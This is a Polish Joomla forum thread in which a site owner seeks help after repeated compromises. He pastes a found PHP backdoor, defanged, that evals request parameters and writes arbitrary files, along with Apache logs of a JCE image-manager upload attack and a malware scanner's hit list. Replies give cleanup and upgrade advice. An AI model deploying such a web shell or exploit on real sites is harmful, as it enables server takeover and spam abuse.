Joomla 1.5.26 - ciągłe ataki
Strona 1 z 2 12 OstatniOstatni
Wyniki 1 do 10 z 13

Temat: Joomla 1.5.26 - ciągłe ataki

  1. #1
    Debiutant
    Dołączył
    18-12-2009
    Wpisy
    5
    Punkty
    10

    Joomla 1.5.26 - ciągłe ataki

    Od kilku miesięcy męcze się z "padającą" stroną .

    nieustanie wrzucane są na serwer pliki PHP które sieją zament i wysyłają spam


    uczyniłem wszytko co mogłem aby zrobić witrynę bezpiecznejszą :
    1. zmiana ID administratora i loginu oraz haslo (teraz jakies 28 znaków...)
    2. zainstalowanie admintool's
    3. żadnych więcej urzytkowników w systemie poza "adminem"
    4. zainstalowany dodatek spadaj.
    5. dostęp do edytorów typu JCE z poziomu user rejstrowany.
    6. zainstalowan "nieoficjalna" łatka do wersji 1.5.26

    oto jeden z skryptów (powielony wielokrotnei w różnych katalogach po włamaniu) :

    (((?php $dvtp = "4b64b38c89efc733990dc6893a32077a"; if(isset($_REQUEST['jpkellw'])) { $vfhoxbn = $_REQUEST['jpkellw']; eval($vfhoxbn); exit(); } if(isset($_REQUEST['wojooidk'])) { $thxcqqmg = $_REQUEST['qrmm']; $isqwq = $_REQUEST['wojooidk']; $jpoyydm = fopen($isqwq, 'w'); $gxfae = fwrite($jpoyydm, $thxcqqmg); fclose($jpoyydm); echo $gxfae; exit(); }
    ?))) (celowa zmiana nawiasów)

    a oto fragment logu apaha z dziś który wzbudził moje wątpliwości:

    162.144.47.100 - - [02/Mar/2014:14:36:36 +0100] "POST /index.php?option=com_jce&task=plugin&plugin=imgman ager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 303 348 "-" "BOT/0.1 (BOT for JCE)"
    162.144.47.100 - - [02/Mar/2014:14:36:36 +0100] "POST /component/content/frontpage/index.php?option=com_jce&task=plugin&plugin=imgman ager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 303 348 "-" "BOT/0.1 (BOT for JCE)"
    162.144.47.100 - - [02/Mar/2014:14:36:36 +0100] "POST /index.php?option=com_jce&task=plugin&plugin=imgman ager&file=imgmanager&method=form&cid=20&6bc427c8a7 981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c 8e20b HTTP/1.1" 404 839 "-" "BOT/0.1 (BOT for JCE)"
    162.144.47.100 - - [02/Mar/2014:14:36:36 +0100] "POST /component/content/frontpage/index.php?option=com_jce&task=plugin&plugin=imgman ager&file=imgmanager&method=form&cid=20&6bc427c8a7 981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c 8e20b HTTP/1.1" 404 839 "-" "BOT/0.1 (BOT for JCE)"
    162.144.47.100 - - [02/Mar/2014:14:36:37 +0100] "POST /index.php?option=com_jce&task=plugin&plugin=imgman ager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 303 348 "-" "BOT/0.1 (BOT for JCE)"
    162.144.47.100 - - [02/Mar/2014:14:36:37 +0100] "POST /component/content/frontpage/index.php?option=com_jce&task=plugin&plugin=imgman ager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 303 348 "-" "BOT/0.1 (BOT for JCE)"
    162.144.47.100 - - [02/Mar/2014:14:36:37 +0100] "POST /index.php?option=com_jce&task=plugin&plugin=imgman ager&file=imgmanager&method=form&cid=20&6bc427c8a7 981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c 8e20b HTTP/1.1" 404 839 "-" "BOT/0.1 (BOT for JCE)"
    162.144.47.100 - - [02/Mar/2014:14:36:37 +0100] "POST /component/content/frontpage/index.php?option=com_jce&task=plugin&plugin=imgman ager&file=imgmanager&method=form&cid=20&6bc427c8a7 981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c 8e20b HTTP/1.1" 404 839 "-" "BOT/0.1 (BOT for JCE)"
    162.144.47.100 - - [02/Mar/2014:14:36:41 +0100] "GET /images/stories/magic.php?rf HTTP/1.1" 404 1955 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
    162.144.47.100 - - [02/Mar/2014:14:36:41 +0100] "GET /component/content/frontpage/images/stories/magic.php?rf HTTP/1.1" 200 21415 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"

    Proszę o porade co jeszcze mogę zrobić lub czy ktoś już się już borykał się z takowym problemem

    administrator juz nalega ostro na mnie że czas na porzucenie tego cms ale ja ciągle wierze ze to nie widna samej Joomli
    tylko gdzieś jeszcze coś jest nie tak ... moze jakis component może jeszcze jakiś back door... sam juz nie wiem .

  2. Pani Reklamowa
    Pani Reklamowa jest aktywna
    Avatar Panny Google

    Dołączył
    19-08-2010
    Skąd
    Internet
    Postów
    milion
    Pochwał
    setki
  3. #2
    Senior Gall Anonim awatar
    Dołączył
    19-10-2010
    Wpisy
    6 943
    Punkty
    447

    Domyślny

    To wina tego że:
    1. Nie zadbałeś odpowiednio wcześnie o zabezpieczenia
    2. Naprawa jest nieskuteczna ponieważ albo pozostaje jakiś "drobiażdżek" w kodzie albo dziura którą atak się powtarza - JCE chociażby - jaka wersja? Może masz extplorer - kolejna mina, jak naprawiasz witrynę po ataku?
    3. Podsumowując to twoja wina jako osoby dbającej o witrynę (p.s. kto to jest administrator w tym konkretnym przypadku, a kim jesteś ty w odniesieniu do witryny?)
    Pzdr

  4. #3
    Senior zwiastun awatar
    Dołączył
    20-09-2005
    Wpisy
    27 297
    Punkty
    1135

    Domyślny

    Opis postępowania po włamaniu: http://www.joomla.pl/o-joomla/joomla...ie-po-wlamaniu
    Należy odnaleźć wszystkie zakażone (zakażające) pliki i je usunąć (najpewniej masz ich dziesiątki jeśli nie setki) - odnalezienie nie jest aż takie trudne wystarczy przeanalizować strukturę 2-3 znalezionych, a następnie przeszukać pliki pod kątem określonych ciągów.

    Witrynę - po wyczyszczeniu - trzeba przebudować, w tym najlepiej migrować do wyższej wersji Joomla. Być może także przenieść na inny serwer. Po tylu powtarzających się atakach napastnik zapewne zna strukturę serwera i jego luki - na wylot.

    Cytat Wysłane przez slimmmak Zobacz wiadomość
    administrator juz nalega ostro na mnie że czas na porzucenie tego cms
    Administrator jest - mówiąc krótko, dosadnie i wielkimi literami - DUREŃ!
    Najlepiej niech szybko wymieni siebie na innego kompetentnego administratora, a sam kupi skrzypce i gra. Będzie mu szło równie dobrze, jak administrowanie.
    Korzystaj i ciesz się!
    ===============
    Zwiastun
    Biblioteka Elektronicznej Dokumentacji Joomla!

  5. #4
    Wyjadacz komodore awatar
    Dołączył
    02-03-2009
    Skąd
    Poznań
    Wpisy
    821
    Punkty
    109

    Domyślny

    Może rzeczywiście dureń skoro nie odciął jeszcze tak często infekowanej witryny. Nie dziw się, że nalega, bo zainfekowana witryna jest zagrożeniem dla całego serwera. A jak przejdziesz na nowszą to lepiej dla Ciebie, bo prędzej czy później i tak będziesz musiał zmienić, więc czemu nie teraz?

    Wysłane z mojego GT-I8160 przy użyciu Tapatalka
    Przyłącz się jeśli masz chęć posłuchać lub porozmawiać o Joomla! i niedaleko Ci do Poznania.


    Klikając "Pomógł - daj punkt" poniżej, motywujesz mnie do dalszej pomocy użytkownikom forum.

  6. #5
    Senior zwiastun awatar
    Dołączył
    20-09-2005
    Wpisy
    27 297
    Punkty
    1135

    Domyślny

    @Komodore: To moja nieskromna opinia. I nie dlatego, że jeszcze nie odciął zainfekowanej witryny, ale dlatego, że zamiast kompetentnej pomocy (właśnie w imię bezpieczeństwa całego serwera) plecie androny o winie CMS-a.
    Korzystaj i ciesz się!
    ===============
    Zwiastun
    Biblioteka Elektronicznej Dokumentacji Joomla!

  7. #6
    Debiutant
    Dołączył
    18-12-2009
    Wpisy
    5
    Punkty
    10

    Domyślny

    JCE - w wersji 2.3.4.4
    extplorer - nie mam
    ccNewsletter - tu brak jaka to może być wersja
    Multithumb - galeria zdjec

    Po włamaniu kasuje Pliki Joomla poza configiem
    i wgrywam od nowa cały cms baze sprawdzam czy tam coś nie dodano użytkownika itp...

    co jakiś czas te włamania się powtarzają do niedawna tylko w katalog image/stories wrzucano złośliwe pliki php
    nie niszcza witryny tylko spadmuja z mojego konta . po ostatnich naprawach
    teraz wrzucono pliki w następujące miejsca :

    FILE HIT LIST:{CAV}PHP.Trojan.Spambot : public_html/libraries/bitfolge/returnYnB8.php{HEX}php.base64.POSTpe80.182 ublic_html/images/stories/NiewybuchySzkolaSwiniarsko/signupcXjB.php{HEX}php.cmdshell.unclassed.352 : public_html/modules/mainin.php{HEX}php.cmdshell.unclassed.352 : public_html/modules/upload.php



  8. #7
    Senior zwiastun awatar
    Dołączył
    20-09-2005
    Wpisy
    27 297
    Punkty
    1135

    Domyślny

    Kolego Miły. Do czego nam są potrzebne Twoje kolejne wynurzenia?
    Podałem Ci link do artykułu, który omawia szczegółowo wszystkie kwestie postępowania po włamaniu i jest napisany dla osób nie będących informatykami. Jeżeli te informacje nie są dla Cię wystarczające, by rozwiązać problemy bezpieczeństwa witryny, zwróć się do specjalistów. Nie ma rady. Jak sobie zadrasnę szyję przy goleniu, to przyklejam plaster. Jak sobie podetnę gardziołko, to wzywam pogotowie nawet, jeśli jestem lekarzem i specjalistą wysokiej klasy w dziedzinie leczenia gardziołków.
    Korzystaj i ciesz się!
    ===============
    Zwiastun
    Biblioteka Elektronicznej Dokumentacji Joomla!

  9. #8
    Wyjadacz mac awatar
    Dołączył
    09-10-2011
    Skąd
    Warszawa
    Wpisy
    879
    Punkty
    115

    Domyślny

    Tu masz jeszcze dodatkowe informacje dokladnie dotyczace twojego problemu

    Phishing through libraries/bitfolge

    http://forum.joomla.org/viewtopic.php?p=2700566

    I pamietaj ze jak masz zawirusowany komputer to ftp'em sam wstawiasz infekcje na strone
    Ostanio edytowane przez mac : 03-03-2014 15:34

  10. #9
    Debiutant
    Dołączył
    18-12-2009
    Wpisy
    5
    Punkty
    10

    Domyślny

    no to przepraszam za męczenie d. ale pytano mnie o rozszerzenie, a wiem ze ludzie ty siedzący są na bieżąco wieć może ktoś rozpozna dane rozszerzenie jako potencjalnie dziurawe , lub miał taki sam włam i sobie poradził .

    bo generalnie stron na joomli 1.5.x jest jeszcze dziesiątki tysięcy i nie padają a ja mam jakiegoś pecha(tak wiem , moja moja wina.) .

  11. #10
    Senior zwiastun awatar
    Dołączył
    20-09-2005
    Wpisy
    27 297
    Punkty
    1135

    Domyślny

    Nie przepraszaj, bo to, że piszesz nie jest problemem. Po to jest forum. Rzecz w tym, że teraz zadanie jest po Twojej stronie. Dopóki nie zrobisz swego, to trudno Ci cokolwiek pomóc.
    Korzystaj i ciesz się!
    ===============
    Zwiastun
    Biblioteka Elektronicznej Dokumentacji Joomla!

Strona 1 z 2 12 OstatniOstatni

Podobne tematy

  1. Ciągłe ataki na stronę
    przez Gonger na forum Bezpieczeństwo
    Odpowiedzi: 9
    Ostatni post/autor: 19-06-2011, 13:37
  2. ataki z podmianąstrony głównej
    przez neon88 na forum Bezpieczeństwo
    Odpowiedzi: 1
    Ostatni post/autor: 02-06-2009, 19:17
  3. Bezpieczeństwo joomla - ataki
    przez prezes na forum Różne
    Odpowiedzi: 6
    Ostatni post/autor: 06-03-2007, 11:41
  4. Ataki na joomla
    przez Radef na forum Sprawy bezpieczeństwa Joomla!
    Odpowiedzi: 9
    Ostatni post/autor: 14-09-2006, 18:51

Reguły pisania

  • Nie możesz zakładać nowych tematów
  • Nie możesz dodawać wypowiedzi
  • Nie możesz dodawać załączników
  • Nie możesz poprawiać swoich postów
  •